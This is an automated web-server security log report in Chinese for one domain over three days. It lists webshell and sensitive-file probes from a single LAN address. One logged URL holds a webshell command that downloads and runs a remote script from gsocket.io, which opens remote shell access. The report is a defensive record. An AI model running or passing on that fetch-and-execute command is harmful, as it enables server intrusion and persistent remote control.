360星图-安全分析报告[2025-12-30至2026-01-02]

日志分析时间:2026-01-02 21:50:47

总访问量
28,720
漏洞攻击数
15
CC攻击数
-
攻击IP
1
漏洞攻击1,CC攻击-
攻击种类
2
攻击IP分布

时间序列

结果概述

  • 共分析域名数:1个

    日志时间周期:3 天

    发现攻击行为总数:15

    攻击结束时间:2026-01-02 15:12:59,共持续 3天15小时

     

漏洞攻击

  • 共发现 1 个IP,发起漏洞攻击 15 次

    2025-12-30 00:07:21,发现第一次web漏洞攻击

    第一次web漏洞攻击IP是:192.168.1.29,来自局域网

    第一次web漏洞攻击是敏感文件探测

    发起web漏洞攻击最多的IP是:192.168.1.29,来自局域网

    web漏洞攻击高峰时段出现在:2025-12-31 08点,共受到 8 攻击

     

恶意IP列表(漏洞攻击)

ID 攻击次数 攻击IP 国家/地区 攻击次数占比%
1 15 192.168.1.29 局域网 100.000%

恶意IP列表(CC攻击)

ID 攻击次数 攻击IP 国家/地区 攻击次数占比%

攻击行为统计

远程代码执行漏洞攻击 10 条 敏感文件探测 5 条

漏洞攻击列表

远程代码执行漏洞攻击Top10(200条)
ID HOST 攻击类型 IP URL 次数 时间
1 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /shell.php 1 2025-12-31 08:42:53
2 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /webshell.php 1 2025-12-31 08:43:56
3 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /shell 1 2025-12-31 08:35:09
4 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /webshell.php 1 2025-12-31 08:17:22
5 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 1 2025-12-31 18:17:52
6 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=id 1 2025-12-31 18:17:44
7 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /shell.php 1 2025-12-31 08:19:56
8 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /webshell 1 2025-12-31 08:37:14
9 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /webshell 1 2025-12-31 08:22:20
10 cnliutz.ipyingshe.net 远程代码执行漏洞攻击 192.168.1.29 /shell 1 2025-12-31 08:28:40
敏感文件探测Top10(200条)
ID HOST 攻击类型 IP URL 次数 时间
1 cnliutz.ipyingshe.net 敏感文件探测 192.168.1.29 /install.php 1 2025-12-31 05:35:35
2 cnliutz.ipyingshe.net 敏感文件探测 192.168.1.29 /install.php 1 2025-12-30 00:07:38
3 cnliutz.ipyingshe.net 敏感文件探测 192.168.1.29 /info.php 1 2025-12-31 05:36:07
4 cnliutz.ipyingshe.net 敏感文件探测 192.168.1.29 /info.php 1 2025-12-30 00:07:21
5 cnliutz.ipyingshe.net 敏感文件探测 192.168.1.29 /wp-content/uploads/2025/12/access.log-2025122521-%E5%8F%AF%E7%96%91%E8%AE%BF%E9%97%AE.txt 1 2026-01-02 15:12:59

CC攻击列表(200条)

ID HOST IP URI 次数 时间